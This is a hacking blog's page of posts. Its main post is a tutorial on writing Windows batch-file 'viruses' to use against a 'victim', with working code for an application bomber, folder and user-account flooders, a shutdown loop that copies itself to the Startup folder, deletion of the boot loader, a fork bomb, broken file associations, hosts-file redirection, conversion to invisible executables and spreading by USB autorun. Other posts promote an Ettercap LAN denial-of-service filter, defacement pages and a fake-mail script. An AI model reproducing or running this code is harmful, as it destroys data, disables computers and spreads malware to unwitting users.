Comments :

Search This Blog


Latest Post

Creating VIRUSES using BATCH Programming

31 Mar 2014 | 0 comments

Creating VIRUSES using BATCH Programming

Hai guys.. This is Prabhu. I just want to share something that i know about creatig VIRUS using BATCH FILES. Batch files are type of executable files with the extention ".bat" . Coming to the point , we can create malicious and irritating virus just by typing their codes and saving them as .bat extension.

I could just you give the codes to paste in notepad and ask you to save files with extension .bat and your deadly batch viruses would be ready to attack. But

instead of that, I have just focussed on making the basics of creating batch files clear and developing the approach to code your own viruses.So please just try to understand the code instead of copying it to notepad.

  • What are Batch Files ?

Lets start with a simple example , Open your command prompt(cmd) and change your current directory on to 'desktop' by typing 'cd desktop' without the quotes.

Now type these commands in order

1. md a //makes directory 'a' on desktop
2. cd a // changes current directory to 'a'
3. md b // makes a directory 'b' in directory 'b'
We first make a folder/directory 'a', then enter in folder 'a',then make a folder 'b' in folder 'a' .
Now delete the folder 'a'.
Lets do the same thing in an other way. Type the same three commands given above in the notepad and save the file as anything.bat . You can give any name in place of 'anything'.               
Now simply double click on this batch file and the same job will be done by the file created using notepad and by using command prompt(cmd) . You will get a folder with name 'a' on your desktop and another folder with name 'b' in it. This means the three commands are executed in order, when we ran the batch file

So a batch file is nothing but a text containing series of commands which are executed automatically line by line when the batch file is run.

What can batch viruses do ?

They can be used to delete the windows files,format data,steal information,irritate victim, consume CPU resources to affect performance,disable firewalls,open ports,modify or destroy registry and for many more purposes.

Now lets start with simple codes, Just copy the code to notepad and save it as anything.bat (here anything means any name youwant to give to your file but extension must be .bat and save it as 'all files' instead of text files).

Note: Type 'help' in command prompt to know about some basic commands and to know about using a particular command , type 'command_name /?' without quotes.

1. Application Bomber

@echo off // It instructs to hide the commands when batch files is executed
:x //loop variable
start winword
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop
This code when executed will start opening different applications present in the system like paint,notepad,command prompt repeatedly(because of infinite loop), irritating the victim and ofcourse affecting the performance.

2. Folder flooder
@echo off
md %random% // makes directory or folder.
goto x
Here %random% is a variable that would generate any positive number randomly. So this code will start creating folders whose name can be any random number.
3.User account flooder
@echo off
net user %random% /add //create user account
goto x

This code will start creating windows user accounts whose names could be any random numbers.

3.Shutdown Virus
copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”
copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup” //these two commands will copy the batchfile in start up folders (in XP)
shutdown -s -t 00 //this will shutdown the computer in 0 seconds

Note : Files in Start up folder gets started automatically when windows starts . You should first two lines of code in every virus code so that it would copy itself in startup folder. Start up folder path in Windows 7 is C:\Users\sys\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Everytime when the victim start's the computer, this batch file in start up will run and shutdown the computer immediately. You will be able to remove this virus by booting the computer in Safe Mode and deleting the batch file from Start Up folder.

4. Deleting boot files
Goto C drive in Win XP , Tools->Folder Option->View
Now Uncheck the option 'Hide operating system files' and check option 'Show hidden files and folders'. Click apply
Now you can see the operating system files. There is a one file 'ntldr' which is boot loader used to boot the windows.
Lets make a batch file to
delete this file from victim's computer and the windows will not start then.
attrib -S -R -H C:\ntldr // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively
del ntldr //delete ntldr file

After running this batch file , system will not reboot and a normal victim should definitely install the windows again use his computer.

5. Fork Bomb
%0|%0 //Its percentage zero pipe percentage zero
This code creates a large number of processes very quickly in order to saturate the process table of windows. It will just hang the windows .


6. Extension Changer
@echo off
assoc .txt=anything // this command associates extension .txt with filetype anything.
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything

Every extension is associated with a filetype like extension ‘.exe’. It is associated with filetype ‘exe file’. To know these, just type ‘assoc’ in command prompt.

Above code changes the association of some extensions to filetype ‘anything’ (means u can write anything) which obviously doesn’t exist. So all exe (paint,games,command prompt and many more),jpeg,png,mpeg files will not be able to open properly.

7. DNS Poisoning
There is a file called ‘hosts’ located at c:\windows\system32\drivers\etc. We can place a website and an IP in front of it. By doing this, we want our web browser to take us to host located at that IP when that website name would be entered. I mean request to resolve IP of website is not sent to Domain Name Server(DNS) if the name of website in hosts file.
The code is:
@echo off
echo > C:\windows\system32\drivers\etc\hosts //this command prints or add in hosts file.
Replace and with IP address and website of your choice. You can take/redirect victim to any host located at specific IP when he wud try to log on to specific website or u can simply block any website by entering its name and any invalid IP address.

Note : Most of the batch viruses are simply undetectable by any anitiviruses
Tip : Coding good viruses just depends on the DOS commands you know and logic you use.

Limitations of Batch Viruses -:
1.Victim can easily read the commands by opening batch file in notepad.
2.The command prompt screen pops up,it alerts the victim and he can stop it.
To overcome these limitations,we need to convert these batch files into executable files that is exe files.
Download this Batch To Exe coverter from here.Remamber the password is "darktechandhack" .
After running converter , open the batch file virus , Save as exe file , set visibility mode 'Invisible application' , than just click on compile button.
You can use other options as per your requirement.

  • Spreading batch viruses through pen drive -:
Step 1:
Open notepad and write
Save file as ‘autorun.inf’
Step 2: Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive .
When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.

Do you like this article? Follow this blog and join as a member for more interesting tricks and tips. Feel free to ask me ,if you have any doubts. To approach personally copntact my mail address in "about me". Suggest your friends to visit this blog for interesting topics.

THANK YOU for reading . Visit my blog regularly and browse the blog for more interesting things...:-)

Thnaks to : Prabhu Vinod Tikkisetti |
Source :
Continue Reading

Dos Attack in Local Area Network With Ettecap

13 Mar 2014 | 0 comments

Dos Attack in Local Area Network With Ettecap

Hello Everybody Now we are going to learn how to perform Dos Attack in a lan network. THIS POST IS ONLY FOR EDUCATIONAL PURPOSE

First Of We Have to Need ettercap Script. Download Link  mentioned below

Zip Pass:hackhippo

 All downloads are original and not repacked or modified in any way by us
 Secure downloads are files hosted and checked by HackHippo

MD5:  6b74a26c0ca1f329e80a418b6a96892c
SHA1: 21835cc858ec2ac8d8c878183098fac2b1076379

  • Our first Filter
  • The filters allow you to change the content of packets,To create a filter, a configuration file must be compiled before being able to be used as a filter
  • You Can Also Copy This Source Code And open a text editor like gnome and write the following Code:


if (ip.src == '' || ip.dst == '')


msg( "HackHippo~# Content Copyrighted to HACK HIPPO <-- Packet Dropped -->\n" );


  • Save This File In Your Root Folder like this Photograph mentioned below.


Step 3 : Need to be Encode This Script 


Step 4 : Start Attack


© HaCkHiPp0-TeaM ! 2013
© HaCkHiPp0-TeaM.

Continue Reading

Top 5 Secure Chating Apps With End-to-End Encryption

1 Mar 2014 | 0 comments

Secure Your your self HAckers Everywhere 

Top 5 Secure Chating Apps With End-to-End Encryption 


  •  Telegram is a messaging app with a focus on speed and security. It’s superfast, simple and free.
  • With Telegram, you can create group chats with up to 200 people so you can stay connected with everyone at once. Plus, you can share videos up to 1GB, send multiple photos from the web, and forward any media you receive in an instant. All your messages are in the cloud, so you can easily access them from any of your devices.
  • For those interested in maximum privacy, we've added Secret Chats, featuring end-to-end encryption to ensure that a message can only be read by its intended recipient. When it comes to Secret Chats, nothing is logged on our servers and you can automatically program the messages to self-destruct from both devices so there is never any record of it.
  • We built Telegram to make messaging safe again so you can take back your right to privacy.
  • Why Switch to Telegram?
  • FAST: Telegram is the fastest messaging app on the market because it uses a decentralized
    infrastructure with data centers positioned around the globe to connect people to the closest possible server.
  • SECURE: Security flaws in popular apps like WhatsApp have gotten a lot of bad press recently, so we made it our mission to provide the best security on the market.
  • CLOUD STORAGE: Never lose your data again! Telegram offers free unlimited cloud storage for all your Telegram messages and media that you can securely access from multiple devices.
  • GROUP CHAT & SHARING: With Telegram, you can form large group chats (up to 200 members), quickly share gigabyte size videos, and send all the photos you want to friends.
  • RELIABLE: Built to deliver your messages in the minimum bytes possible, Telegram is the most reliable messaging system ever made. It even works on the weakest mobile connections!
  • 100% FREE & NO ADS: Telegram is free and will always be free. We do not plan to sell ads or introduce subscription fees.
  • PRIVACY: We take your privacy very seriously and will never give third parties access to your data!


Threema is a mobile messaging app that puts security first. With true end-to-end encryption, you can rest
assured that only you and the intended recipient can read your messages.
Unlike other popular messaging apps (including those claiming to use encryption), even we as the server operator have absolutely no way to read your messages.
• End-to-end encryption of text messages, images, videos and GPS locations 
• Contact synchronization (optional): find other Threema users automatically 
• Send images and videos 
• Share your location on a map 
• Verify your contacts' public keys by scanning a QR code from their mobile phone, all within the app
Threema is Made in Switzerland, and all servers are hosted there as well for maximum privacy.

Surespot Encrypted Messenger

  • NEW FEATURE- Voice Messaging. If your eyes or hands are busy, your keyboard too cumbersome, or you just want to say it instead of type it- voice messages are sent with the same exceptional end to end encryption as the rest of your surespot messages. Simply hold down the microphone button to record your voice message and release to send. Activate the feature from within surespot to start sending voice messages (it is free to receive and play them) and enjoy speaking freely.
  • Be sure no one else can see your mobile messages. Use surespot and everything you send can only be read by the person you sent it to. Period. Everything sent using surespot is end-to-end encrypted with symmetric-key encryption (256 bit AES-GCM) using keys created with 521 bit ECDH shared secret derivation, but you wont notice because security in surespot is built-in, not a layer over something else. Be confident sending private information and pictures, you have control over your messages, when you delete a sent message it will be removed from the receiver's phone and images are not shareable unless you make them so. Multiple identities allow you to be who you want with just who you want, and if anyone gets annoying you can block them. Surespot does not require or store your phone number or email address and we don't mine your data, no advertisements here!
  • Surespot uses your mobile data plan and Wi-Fi so you don’t get texting charges, especially important for those friends in other countries.
  • Surespot is OPEN SOURCE software, this creates transparency and invites peer review so you can be confident in our claims. If you wish to contribute/review you can find us on GitHub listed under 'surespot'.
  • We always appreciate your feedback and questions. Please contact us

TextSecure Private Messenger

TextSecure is a messaging app that allows you to take back your privacy while easily communicating with friends.
Using TextSecure, you can communicate instantly while avoiding SMS fees, create groups so that you can chat in real time with all your friends at once, and share media or attachments all with complete privacy. The server never has access to any of your communication and never stores any of your data.
★ Private. TextSecure uses an advanced end to end encryption protocol that provides privacy for every message every time.
★ Open Source. TextSecure is Free and Open Source, enabling anyone to verify its security by auditing the code. TextSecure is the only private messenger that uses open source peer-reviewed cryptographic protocols to keep your messages safe.
★ Group Chat. TextSecure allows you to create encrypted groups so you can have private conversations with all your friends at once. Not only are the messages encrypted, but the TextSecure server never has access to any group metadata such as the membership list, group title, or group icon.
★ Fast. The TextSecure protocol is designed to operate in the most constrained environment possible. Using TextSecure, messages are instantly delivered to friends.

RedPhone Secure Calls:

Like privacy? Secure your calls for free with RedPhone. It's that simple.

RedPhone provides end-to-end encryption for your calls, securing your conversations so that nobody can listen in.
★ RedPhone uses your normal phone number to make and receive calls, so you don't need yet another identifier.
★ Use the default system dialer and contacts apps to make calls as you normally would.
★ RedPhone will give you the opportunity to upgrade to encrypted calls whenever the person you're calling also has RedPhone installed.
★ RedPhone calls are encrypted end-to-end, but function just like you're used to.
★ Free and Open Source, enabling anyone to verify its security by auditing the code.
★ Uses wifi or data, not your plan's voice minutes.
More information:
Please file any bugs, issues, or feature requests at:
Secure Calls, Private Calls, Secure VoIP, Private VoIP, Encrypted VoIP, Private Conversations, Free Calls

Source: Google Play,The Hackers News 
Continue Reading

Website Deface Page

27 Feb 2014 | 0 comments

Download Free "Website Deface Page"

Dear Friends Download Hack Hippo latest and Unique Website Deface Page.
Version 0.1

Website Deface Page

Website Deface Page

Website Deface Page

Website Deface Page

Website Deface Page

Website Deface Page

Website Deface Page

Website Deface Page

Zip Pass:hackhippo
 All downloads are original and not repacked or modified in any way by us
 Secure downloads are files hosted and checked by HackHippo

© HaCkHiPp0-TeaM ! 2013
HaCkHiPp0-TeaM R0oTx:Sahil_Rai
Continue Reading

Deface page


Download Free "Website Deface Page"

Dear Friends Download Hack Hippo latest and Unique Website Deface Page.
Version 1.0

Website Deface Page

Website Deface Page

Zip Pass:hackhippo
 All downloads are original and not repacked or modified in any way by us
 Secure downloads are files hosted and checked by HackHippo

Continue Reading


4 Feb 2014 | 0 comments


Zip Pass:hackhippo

 All downloads are original and not repacked or modified in any way by us
 Secure downloads are files hosted and checked by HackHippo
Continue Reading

New PHP Fake Mail Script Free Downloads


Hack Hippo New Php Fake Mailer Script Working Fine 100% 

Download:Send Mail Option Is password protected
Password is : hippo12

 All downloads are original and not repacked or modified in any way by us
 Secure downloads are files hosted and checked by HackHippo

Send Mail Option Is password protected 
Password is : hippo12

Continue Reading